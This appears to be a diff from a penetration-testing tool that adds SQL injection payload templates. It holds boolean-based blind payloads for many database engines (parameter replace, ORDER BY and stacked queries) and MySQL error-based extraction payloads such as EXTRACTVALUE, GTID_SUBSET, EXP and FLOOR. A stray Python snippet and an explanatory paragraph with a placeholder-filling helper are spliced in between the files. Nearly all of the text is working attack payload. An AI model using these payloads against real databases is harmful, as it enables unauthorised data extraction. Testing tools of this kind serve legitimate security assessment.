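    template = "(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))"
    print(render_replace(template, "5", "ASCII(SUBSTRING(current_database(),1,1))>96"))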
+ + + Oracle boolean-based blind - Parameter replace + 1 + 3 + 1 + 1,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + +
+ Oracle +
+
+ + + Oracle boolean-based blind - Parameter replace (original value) + 1 + 4 + 1 + 1,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + +
+ Oracle +
+
+ + + Informix boolean-based blind - Parameter replace + 1 + 3 + 1 + 1,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL) + +
+ Informix +
+
+ + + Informix boolean-based blind - Parameter replace (original value) + 1 + 4 + 1 + 1,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL) + +
+ Informix +
+
+ + + Microsoft Access boolean-based blind - Parameter replace + 1 + 3 + 1 + 1,3 + 3 + IIF([INFERENCE],[RANDNUM],1/0) + + IIF([RANDNUM]=[RANDNUM],[RANDNUM],1/0) + + + IIF([RANDNUM]=[RANDNUM1],[RANDNUM],1/0) + +
+ Microsoft Access +
+
+ + + Microsoft Access boolean-based blind - Parameter replace (original value) + 1 + 4 + 1 + 1,3 + 3 + IIF([INFERENCE],[ORIGVALUE],1/0) + + IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0) + + + IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0) + +
+ Microsoft Access +
+
+ + + + Boolean-based blind - Parameter replace (DUAL) + 1 + 2 + 1 + 1,2,3 + 3 + (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) + + (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) + + + (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) + + + + + Boolean-based blind - Parameter replace (DUAL - original value) + 1 + 3 + 1 + 1,2,3 + 3 + (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) + + (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) + + + (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) + + + + + + + Boolean-based blind - Parameter replace (CASE) + 1 + 2 + 1 + 1,3 + 3 + (CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END) + + (CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE NULL END) + + + (CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE NULL END) + + + + + Boolean-based blind - Parameter replace (CASE - original value) + 1 + 3 + 1 + 1,3 + 3 + (CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END) + + (CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END) + + + (CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END) + + + + + + + MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause + 1 + 2 + 1 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + +
+ MySQL + >= 5.0 +
+
+ + + MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value) + 1 + 3 + 1 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + +
+ MySQL + >= 5.0 +
+
+ + + MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause + 1 + 3 + 1 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + +
+ MySQL + < 5.0 +
+
+ + + MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value) + 1 + 4 + 1 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + +
+ MySQL + < 5.0 +
+
+ + + PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause + 1 + 2 + 1 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END)) + +
+ PostgreSQL +
+
+ + + + PostgreSQL boolean-based blind - ORDER BY clause (original value) + 1 + 4 + 1 + 3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + +
+ PostgreSQL +
+
+ + + + + PostgreSQL boolean-based blind - ORDER BY clause (GENERATE_SERIES) + 1 + 5 + 1 + + 3 + 1 + ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) + + ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) + + + ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1) + +
+ PostgreSQL +
+
+ + + Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause + 1 + 3 + 1 + 3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (original value) + 1 + 4 + 1 + 3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + +
+ Microsoft SQL Server + Sybase +
+
+ + + Oracle boolean-based blind - ORDER BY, GROUP BY clause + 1 + 3 + 1 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + +
+ Oracle +
+
+ + + Oracle boolean-based blind - ORDER BY, GROUP BY clause (original value) + 1 + 4 + 1 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + +
+ Oracle +
+
+ + + Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause + 1 + 4 + 1 + 2,3 + 1 + ,IIF([INFERENCE],1,1/0) + + ,IIF([RANDNUM]=[RANDNUM],1,1/0) + + + ,IIF([RANDNUM]=[RANDNUM1],1,1/0) + +
+ Microsoft Access +
+
+ + + Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause (original value) + 1 + 5 + 1 + 2,3 + 1 + ,IIF([INFERENCE],[ORIGVALUE],1/0) + + ,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0) + + + ,IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0) + +
+ Microsoft Access +
+
+ + + SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause + 1 + 4 + 1 + 2,3 + 1 + ,(CASE WHEN [INFERENCE] THEN 1 ELSE NULL END) + + ,(CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END) + + + ,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END) + +
+ SAP MaxDB +
+
+ + + SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause (original value) + 1 + 5 + 1 + 2,3 + 1 + ,(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END) + + ,(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END) + + + ,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END) + +
+ SAP MaxDB +
+
+ + + IBM DB2 boolean-based blind - ORDER BY clause + 1 + 4 + 1 + 3 + 1 + ,(SELECT CASE WHEN [INFERENCE] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) + + ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) + + + ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) + +
+ IBM DB2 +
+
+ + + IBM DB2 boolean-based blind - ORDER BY clause (original value) + 1 + 5 + 1 + 3 + 1 + ,(SELECT CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) + + ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) + + + ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) + +
+ IBM DB2 +
+
+ + + + HAVING boolean-based blind - WHERE, GROUP BY clause + 1 + 3 + 1 + 1,2 + 1 + HAVING [INFERENCE] + + HAVING [RANDNUM]=[RANDNUM] + + + HAVING [RANDNUM]=[RANDNUM1] + + + + + + + MySQL >= 5.0 boolean-based blind - Stacked queries + 1 + 4 + 1 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) + # + + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) + +
+ MySQL + >= 5.0 +
+
+ + + MySQL < 5.0 boolean-based blind - Stacked queries + 1 + 5 + 1 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) + # + + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) + +
+ MySQL + < 5.0 +
+
+ + + PostgreSQL boolean-based blind - Stacked queries + 1 + 3 + 1 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) + -- + + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) + +
+ PostgreSQL +
+
+ + + + PostgreSQL boolean-based blind - Stacked queries (GENERATE_SERIES) + 1 + 5 + 1 + 1-8 + 1 + ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1 + + ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1 + -- + + + ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1 + +
+ PostgreSQL +
+
+ + + Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF) + 1 + 3 + 1 + 1-8 + 1 + ;IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] + + ;IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] + -- + + + ;IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase boolean-based blind - Stacked queries + 1 + 4 + 1 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END) + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END) + -- + + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END) + +
+ Microsoft SQL Server + Sybase +
+
+ + + Oracle boolean-based blind - Stacked queries + 1 + 4 + 1 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL + -- + + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL + +
+ Oracle +
+
+ + + Microsoft Access boolean-based blind - Stacked queries + 1 + 5 + 1 + 1-8 + 1 + ;IIF([INFERENCE],1,1/0) + + ;IIF([RANDNUM]=[RANDNUM],1,1/0) + %16 + + + ;IIF([RANDNUM]=[RANDNUM1],1,1/0) + +
+ Microsoft Access +
+
+ + + SAP MaxDB boolean-based blind - Stacked queries + 1 + 5 + 1 + 1-8 + 1 + ;SELECT CASE WHEN [INFERENCE] THEN 1 ELSE NULL END FROM DUAL + + ;SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END FROM DUAL + -- + + + ;SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END FROM DUAL + +
+ SAP MaxDB +
+
+ +
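The boolean-based templates in the file above are parameterized strings: [INFERENCE] is filled with the predicate being tested, [RANDNUM]/[RANDNUM1] with random integers, and [ORIGVALUE] with the parameter's original value. Below is a minimal sketch of that substitution step, reusing the generic CASE template that appears verbatim in the tests above; the helper and variable names are illustrative only, not sqlmap's internal API.

```python
# Minimal sketch of instantiating a boolean-based blind template from the
# payloads above. Placeholder names ([INFERENCE], [RANDNUM], [RANDNUM1])
# come from the XML itself; the helper is illustrative only.
import random

TEMPLATE = "(CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END)"  # generic CASE test above

def instantiate(template, inference=None):
    randnum = random.randint(1000, 9999)
    payload = template.replace("[RANDNUM1]", str(randnum + 1))  # longer token first
    payload = payload.replace("[RANDNUM]", str(randnum))
    if inference is None:
        # always-true predicate, used to record what a TRUE response looks like
        inference = "%d=%d" % (randnum, randnum)
    return payload.replace("[INFERENCE]", inference)

true_probe = instantiate(TEMPLATE)
false_probe = instantiate(TEMPLATE, inference="1=2")
print(true_probe)
print(false_probe)
```

Whether a given condition holds is then decided by comparing the response against the recorded always-true and always-false probe responses, which is what the paired reference payloads listed in each test are for.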
diff --git a/data/xml/payloads/error_based.xml b/data/xml/payloads/error_based.xml new file mode 100644 index 00000000000..3023df9fba8 --- /dev/null +++ b/data/xml/payloads/error_based.xml @@ -0,0 +1,1538 @@ + + + + + + MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) + 2 + 1 + 1 + 1,2,3,8,9 + 1 + AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) + + + AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.1 +
+
+ + + MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) + 2 + 1 + 3 + 1,2,3,8,9 + + 1 + OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) + + + OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.1 +
+
+ + + MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) + 2 + 2 + 1 + 1,2,3,8,9 + 1 + AND GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM]) + + AND GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM]) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.6 +
+
+ + + MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET) + 2 + 2 + 3 + 1,8,9 + 1 + OR GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM]) + + OR GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM]) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.6 +
+
+ + + MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED) + 2 + 4 + 1 + 1,2,3,8,9 + 1 + AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610))) + + + AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610))) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.5 +
+
+ + + + MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED) + 2 + 4 + 3 + 1,8,9 + 1 + OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610))) + + + OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610))) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.5 +
+
+ + + MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP) + 2 + 4 + 1 + 1,2,3,8,9 + 1 + AND EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x)) + + AND EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x)) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.5 +
+
+ + + MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP) + 2 + 4 + 3 + 1,8,9 + 1 + OR EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x)) + + OR EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x)) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.5 +
+
+ + + MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS) + 2 + 5 + 1 + 1,2,3,8,9 + 1 + AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8))) + + AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8))) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.7.8 +
+
+ + + + MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS) + 2 + 5 + 3 + 1,8,9 + 1 + OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8))) + + OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8))) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.7.8 +
+
+ + + MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + 2 + 4 + 1 + 1,2,3,8,9 + 1 + AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + + AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.0 +
+
+ + + MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + 2 + 4 + 3 + 1,2,3,8,9 + + 1 + OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + + OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.0 +
+
